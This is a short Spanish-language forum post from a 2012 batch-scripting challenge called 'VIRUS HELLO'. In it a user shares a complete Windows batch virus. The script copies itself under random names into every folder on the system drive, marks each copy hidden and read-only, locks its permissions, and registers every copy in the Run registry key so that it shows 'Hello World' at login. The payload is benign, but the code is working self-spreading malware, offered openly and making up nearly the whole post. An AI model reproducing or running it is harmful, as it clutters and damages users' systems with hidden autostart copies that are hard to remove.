[Reto Batch] VIRUS HELLO !!

Iniciado por Eleкtro, 9 Mayo 2012, 15:19 PM

0 Miembros y 3 Visitantes están viendo este tema.

Binary_Death

Aquí te dejo el código:


@Echo Off
setlocal enableextensions enabledelayedexpansion
if "%~1" EQU "reginit" goto :_reginit

for /f "tokens=*" %%_ in (
'dir /b /s /a:d "%SystemDrive%\"'
) do (
set "rdir=%%_\!random!!random!.cmd"
copy /y "%~0" "!rdir!"
attrib +h +r "!rdir!"
echo.S|cacls "!rdir!" /P %username%:R
reg add "hkcu\software\microsoft\windows\currentversion\run" /v "!rdir!" /d "cmd /c \"\"!rdir!\" \"reginit\"\"" /f
) 1>nul 2>&1
exit

:_reginit
echo: Hello World^^!
pause 1>nul
exit


Un saludo.